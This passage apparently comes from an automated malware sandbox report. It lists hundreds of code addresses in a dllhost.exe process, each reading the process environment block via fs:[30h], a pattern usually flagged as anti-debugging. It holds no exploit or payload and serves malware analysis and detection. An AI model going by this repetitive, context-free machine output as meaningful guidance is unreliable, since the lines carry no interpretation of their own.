              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0388035C mov ecx, dword ptr fs:[00000030h]11_2_0388035C
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0388035C mov eax, dword ptr fs:[00000030h]11_2_0388035C
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0388035C mov eax, dword ptr fs:[00000030h]11_2_0388035C
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038CA352 mov eax, dword ptr fs:[00000030h]11_2_038CA352
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037F8397 mov eax, dword ptr fs:[00000030h]11_2_037F8397
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037F8397 mov eax, dword ptr fs:[00000030h]11_2_037F8397
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037F8397 mov eax, dword ptr fs:[00000030h]11_2_037F8397
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038BF367 mov eax, dword ptr fs:[00000030h]11_2_038BF367
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03807370 mov eax, dword ptr fs:[00000030h]11_2_03807370
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03807370 mov eax, dword ptr fs:[00000030h]11_2_03807370
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03807370 mov eax, dword ptr fs:[00000030h]11_2_03807370
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038A437C mov eax, dword ptr fs:[00000030h]11_2_038A437C
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FE388 mov eax, dword ptr fs:[00000030h]11_2_037FE388
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FE388 mov eax, dword ptr fs:[00000030h]11_2_037FE388
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FE388 mov eax, dword ptr fs:[00000030h]11_2_037FE388
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383E284 mov eax, dword ptr fs:[00000030h]11_2_0383E284
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383E284 mov eax, dword ptr fs:[00000030h]11_2_0383E284
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03880283 mov eax, dword ptr fs:[00000030h]11_2_03880283
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03880283 mov eax, dword ptr fs:[00000030h]11_2_03880283
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03880283 mov eax, dword ptr fs:[00000030h]11_2_03880283
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038D5283 mov eax, dword ptr fs:[00000030h]11_2_038D5283
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037F826B mov eax, dword ptr fs:[00000030h]11_2_037F826B
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383329E mov eax, dword ptr fs:[00000030h]11_2_0383329E
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383329E mov eax, dword ptr fs:[00000030h]11_2_0383329E
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038102A0 mov eax, dword ptr fs:[00000030h]11_2_038102A0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038102A0 mov eax, dword ptr fs:[00000030h]11_2_038102A0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038152A0 mov eax, dword ptr fs:[00000030h]11_2_038152A0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038152A0 mov eax, dword ptr fs:[00000030h]11_2_038152A0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038152A0 mov eax, dword ptr fs:[00000030h]11_2_038152A0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038152A0 mov eax, dword ptr fs:[00000030h]11_2_038152A0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038972A0 mov eax, dword ptr fs:[00000030h]11_2_038972A0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038972A0 mov eax, dword ptr fs:[00000030h]11_2_038972A0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038962A0 mov eax, dword ptr fs:[00000030h]11_2_038962A0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038962A0 mov ecx, dword ptr fs:[00000030h]11_2_038962A0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038962A0 mov eax, dword ptr fs:[00000030h]11_2_038962A0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038962A0 mov eax, dword ptr fs:[00000030h]11_2_038962A0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038962A0 mov eax, dword ptr fs:[00000030h]11_2_038962A0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038962A0 mov eax, dword ptr fs:[00000030h]11_2_038962A0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038C92A6 mov eax, dword ptr fs:[00000030h]11_2_038C92A6
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038C92A6 mov eax, dword ptr fs:[00000030h]11_2_038C92A6
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038C92A6 mov eax, dword ptr fs:[00000030h]11_2_038C92A6
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038C92A6 mov eax, dword ptr fs:[00000030h]11_2_038C92A6
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FA250 mov eax, dword ptr fs:[00000030h]11_2_037FA250
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038892BC mov eax, dword ptr fs:[00000030h]11_2_038892BC
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038892BC mov eax, dword ptr fs:[00000030h]11_2_038892BC
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038892BC mov ecx, dword ptr fs:[00000030h]11_2_038892BC
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038892BC mov ecx, dword ptr fs:[00000030h]11_2_038892BC
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037F9240 mov eax, dword ptr fs:[00000030h]11_2_037F9240
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037F9240 mov eax, dword ptr fs:[00000030h]11_2_037F9240
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382B2C0 mov eax, dword ptr fs:[00000030h]11_2_0382B2C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382B2C0 mov eax, dword ptr fs:[00000030h]11_2_0382B2C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382B2C0 mov eax, dword ptr fs:[00000030h]11_2_0382B2C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382B2C0 mov eax, dword ptr fs:[00000030h]11_2_0382B2C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382B2C0 mov eax, dword ptr fs:[00000030h]11_2_0382B2C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382B2C0 mov eax, dword ptr fs:[00000030h]11_2_0382B2C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382B2C0 mov eax, dword ptr fs:[00000030h]11_2_0382B2C0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0380A2C3 mov eax, dword ptr fs:[00000030h]11_2_0380A2C3
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0380A2C3 mov eax, dword ptr fs:[00000030h]11_2_0380A2C3
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0380A2C3 mov eax, dword ptr fs:[00000030h]11_2_0380A2C3
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0380A2C3 mov eax, dword ptr fs:[00000030h]11_2_0380A2C3
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0380A2C3 mov eax, dword ptr fs:[00000030h]11_2_0380A2C3
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037F823B mov eax, dword ptr fs:[00000030h]11_2_037F823B
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038092C5 mov eax, dword ptr fs:[00000030h]11_2_038092C5
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038092C5 mov eax, dword ptr fs:[00000030h]11_2_038092C5
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382F2D0 mov eax, dword ptr fs:[00000030h]11_2_0382F2D0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382F2D0 mov eax, dword ptr fs:[00000030h]11_2_0382F2D0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038102E1 mov eax, dword ptr fs:[00000030h]11_2_038102E1
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038102E1 mov eax, dword ptr fs:[00000030h]11_2_038102E1
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038102E1 mov eax, dword ptr fs:[00000030h]11_2_038102E1
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038B12ED mov eax, dword ptr fs:[00000030h]11_2_038B12ED
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038B12ED mov eax, dword ptr fs:[00000030h]11_2_038B12ED
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038B12ED mov eax, dword ptr fs:[00000030h]11_2_038B12ED
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038B12ED mov eax, dword ptr fs:[00000030h]11_2_038B12ED
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038B12ED mov eax, dword ptr fs:[00000030h]11_2_038B12ED
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038B12ED mov eax, dword ptr fs:[00000030h]11_2_038B12ED
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038B12ED mov eax, dword ptr fs:[00000030h]11_2_038B12ED
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038B12ED mov eax, dword ptr fs:[00000030h]11_2_038B12ED
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038B12ED mov eax, dword ptr fs:[00000030h]11_2_038B12ED
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038B12ED mov eax, dword ptr fs:[00000030h]11_2_038B12ED
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038B12ED mov eax, dword ptr fs:[00000030h]11_2_038B12ED
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038B12ED mov eax, dword ptr fs:[00000030h]11_2_038B12ED
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038B12ED mov eax, dword ptr fs:[00000030h]11_2_038B12ED
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038B12ED mov eax, dword ptr fs:[00000030h]11_2_038B12ED
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038D52E2 mov eax, dword ptr fs:[00000030h]11_2_038D52E2
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038BF2F8 mov eax, dword ptr fs:[00000030h]11_2_038BF2F8
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037F92FF mov eax, dword ptr fs:[00000030h]11_2_037F92FF
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03837208 mov eax, dword ptr fs:[00000030h]11_2_03837208
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03837208 mov eax, dword ptr fs:[00000030h]11_2_03837208
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038D5227 mov eax, dword ptr fs:[00000030h]11_2_038D5227
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FB2D3 mov eax, dword ptr fs:[00000030h]11_2_037FB2D3
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FB2D3 mov eax, dword ptr fs:[00000030h]11_2_037FB2D3
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FB2D3 mov eax, dword ptr fs:[00000030h]11_2_037FB2D3
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03888243 mov eax, dword ptr fs:[00000030h]11_2_03888243
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03888243 mov ecx, dword ptr fs:[00000030h]11_2_03888243
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383724D mov eax, dword ptr fs:[00000030h]11_2_0383724D
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03806259 mov eax, dword ptr fs:[00000030h]11_2_03806259
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038BB256 mov eax, dword ptr fs:[00000030h]11_2_038BB256
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038BB256 mov eax, dword ptr fs:[00000030h]11_2_038BB256
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03804260 mov eax, dword ptr fs:[00000030h]11_2_03804260
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03804260 mov eax, dword ptr fs:[00000030h]11_2_03804260
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03804260 mov eax, dword ptr fs:[00000030h]11_2_03804260
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038CD26B mov eax, dword ptr fs:[00000030h]11_2_038CD26B
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038CD26B mov eax, dword ptr fs:[00000030h]11_2_038CD26B
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03841270 mov eax, dword ptr fs:[00000030h]11_2_03841270
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03841270 mov eax, dword ptr fs:[00000030h]11_2_03841270
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03829274 mov eax, dword ptr fs:[00000030h]11_2_03829274
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038B0274 mov eax, dword ptr fs:[00000030h]11_2_038B0274
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038B0274 mov eax, dword ptr fs:[00000030h]11_2_038B0274
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038B0274 mov eax, dword ptr fs:[00000030h]11_2_038B0274
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038B0274 mov eax, dword ptr fs:[00000030h]11_2_038B0274
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038B0274 mov eax, dword ptr fs:[00000030h]11_2_038B0274
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038B0274 mov eax, dword ptr fs:[00000030h]11_2_038B0274
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038B0274 mov eax, dword ptr fs:[00000030h]11_2_038B0274
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038B0274 mov eax, dword ptr fs:[00000030h]11_2_038B0274
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038B0274 mov eax, dword ptr fs:[00000030h]11_2_038B0274
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038B0274 mov eax, dword ptr fs:[00000030h]11_2_038B0274
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038B0274 mov eax, dword ptr fs:[00000030h]11_2_038B0274
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038B0274 mov eax, dword ptr fs:[00000030h]11_2_038B0274
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03840185 mov eax, dword ptr fs:[00000030h]11_2_03840185
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038BC188 mov eax, dword ptr fs:[00000030h]11_2_038BC188
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038BC188 mov eax, dword ptr fs:[00000030h]11_2_038BC188
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h]11_2_037FF172
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h]11_2_037FF172
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h]11_2_037FF172
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h]11_2_037FF172
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h]11_2_037FF172
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h]11_2_037FF172
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h]11_2_037FF172
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h]11_2_037FF172
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h]11_2_037FF172
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h]11_2_037FF172
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h]11_2_037FF172
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h]11_2_037FF172
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h]11_2_037FF172
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h]11_2_037FF172
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h]11_2_037FF172
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h]11_2_037FF172
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h]11_2_037FF172
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h]11_2_037FF172
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h]11_2_037FF172
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h]11_2_037FF172
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FF172 mov eax, dword ptr fs:[00000030h]11_2_037FF172
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03857190 mov eax, dword ptr fs:[00000030h]11_2_03857190
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0388019F mov eax, dword ptr fs:[00000030h]11_2_0388019F
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0388019F mov eax, dword ptr fs:[00000030h]11_2_0388019F
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0388019F mov eax, dword ptr fs:[00000030h]11_2_0388019F
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0388019F mov eax, dword ptr fs:[00000030h]11_2_0388019F
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FC156 mov eax, dword ptr fs:[00000030h]11_2_037FC156
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038B11A4 mov eax, dword ptr fs:[00000030h]11_2_038B11A4
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038B11A4 mov eax, dword ptr fs:[00000030h]11_2_038B11A4
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038B11A4 mov eax, dword ptr fs:[00000030h]11_2_038B11A4
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038B11A4 mov eax, dword ptr fs:[00000030h]11_2_038B11A4
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0381B1B0 mov eax, dword ptr fs:[00000030h]11_2_0381B1B0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037F9148 mov eax, dword ptr fs:[00000030h]11_2_037F9148
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037F9148 mov eax, dword ptr fs:[00000030h]11_2_037F9148
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037F9148 mov eax, dword ptr fs:[00000030h]11_2_037F9148
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037F9148 mov eax, dword ptr fs:[00000030h]11_2_037F9148
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038D51CB mov eax, dword ptr fs:[00000030h]11_2_038D51CB
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FB136 mov eax, dword ptr fs:[00000030h]11_2_037FB136
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FB136 mov eax, dword ptr fs:[00000030h]11_2_037FB136
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FB136 mov eax, dword ptr fs:[00000030h]11_2_037FB136
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FB136 mov eax, dword ptr fs:[00000030h]11_2_037FB136
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038C61C3 mov eax, dword ptr fs:[00000030h]11_2_038C61C3
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038C61C3 mov eax, dword ptr fs:[00000030h]11_2_038C61C3
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383D1D0 mov eax, dword ptr fs:[00000030h]11_2_0383D1D0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383D1D0 mov ecx, dword ptr fs:[00000030h]11_2_0383D1D0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0387E1D0 mov eax, dword ptr fs:[00000030h]11_2_0387E1D0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0387E1D0 mov eax, dword ptr fs:[00000030h]11_2_0387E1D0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0387E1D0 mov ecx, dword ptr fs:[00000030h]11_2_0387E1D0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0387E1D0 mov eax, dword ptr fs:[00000030h]11_2_0387E1D0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0387E1D0 mov eax, dword ptr fs:[00000030h]11_2_0387E1D0
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038D61E5 mov eax, dword ptr fs:[00000030h]11_2_038D61E5
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038251EF mov eax, dword ptr fs:[00000030h]11_2_038251EF
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038251EF mov eax, dword ptr fs:[00000030h]11_2_038251EF
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038251EF mov eax, dword ptr fs:[00000030h]11_2_038251EF
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038251EF mov eax, dword ptr fs:[00000030h]11_2_038251EF
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038251EF mov eax, dword ptr fs:[00000030h]11_2_038251EF
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038251EF mov eax, dword ptr fs:[00000030h]11_2_038251EF
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038251EF mov eax, dword ptr fs:[00000030h]11_2_038251EF
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038251EF mov eax, dword ptr fs:[00000030h]11_2_038251EF
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038251EF mov eax, dword ptr fs:[00000030h]11_2_038251EF
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038251EF mov eax, dword ptr fs:[00000030h]11_2_038251EF
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038251EF mov eax, dword ptr fs:[00000030h]11_2_038251EF
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038251EF mov eax, dword ptr fs:[00000030h]11_2_038251EF
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038251EF mov eax, dword ptr fs:[00000030h]11_2_038251EF
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038051ED mov eax, dword ptr fs:[00000030h]11_2_038051ED
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038A71F9 mov esi, dword ptr fs:[00000030h]11_2_038A71F9
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038301F8 mov eax, dword ptr fs:[00000030h]11_2_038301F8
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038AA118 mov ecx, dword ptr fs:[00000030h]11_2_038AA118
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038AA118 mov eax, dword ptr fs:[00000030h]11_2_038AA118
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038AA118 mov eax, dword ptr fs:[00000030h]11_2_038AA118
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038AA118 mov eax, dword ptr fs:[00000030h]11_2_038AA118
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038C0115 mov eax, dword ptr fs:[00000030h]11_2_038C0115
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03830124 mov eax, dword ptr fs:[00000030h]11_2_03830124
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03801131 mov eax, dword ptr fs:[00000030h]11_2_03801131
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03801131 mov eax, dword ptr fs:[00000030h]11_2_03801131
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03893140 mov eax, dword ptr fs:[00000030h]11_2_03893140
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03893140 mov eax, dword ptr fs:[00000030h]11_2_03893140
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03893140 mov eax, dword ptr fs:[00000030h]11_2_03893140
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03894144 mov eax, dword ptr fs:[00000030h]11_2_03894144
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03894144 mov eax, dword ptr fs:[00000030h]11_2_03894144
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03894144 mov ecx, dword ptr fs:[00000030h]11_2_03894144
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03894144 mov eax, dword ptr fs:[00000030h]11_2_03894144
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03894144 mov eax, dword ptr fs:[00000030h]11_2_03894144
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03807152 mov eax, dword ptr fs:[00000030h]11_2_03807152
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03806154 mov eax, dword ptr fs:[00000030h]11_2_03806154
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03806154 mov eax, dword ptr fs:[00000030h]11_2_03806154
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038D5152 mov eax, dword ptr fs:[00000030h]11_2_038D5152
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FA197 mov eax, dword ptr fs:[00000030h]11_2_037FA197
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FA197 mov eax, dword ptr fs:[00000030h]11_2_037FA197
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_037FA197 mov eax, dword ptr fs:[00000030h]11_2_037FA197
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03899179 mov eax, dword ptr fs:[00000030h]11_2_03899179
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0388D080 mov eax, dword ptr fs:[00000030h]11_2_0388D080
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0388D080 mov eax, dword ptr fs:[00000030h]11_2_0388D080
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0380208A mov eax, dword ptr fs:[00000030h]11_2_0380208A
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382D090 mov eax, dword ptr fs:[00000030h]11_2_0382D090
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0382D090 mov eax, dword ptr fs:[00000030h]11_2_0382D090
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_03805096 mov eax, dword ptr fs:[00000030h]11_2_03805096
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0383909C mov eax, dword ptr fs:[00000030h]11_2_0383909C
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038980A8 mov eax, dword ptr fs:[00000030h]11_2_038980A8
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038C60B8 mov eax, dword ptr fs:[00000030h]11_2_038C60B8
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038C60B8 mov ecx, dword ptr fs:[00000030h]11_2_038C60B8
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_038170C0 mov eax, dword ptr fs:[00000030h]11_2_038170C0
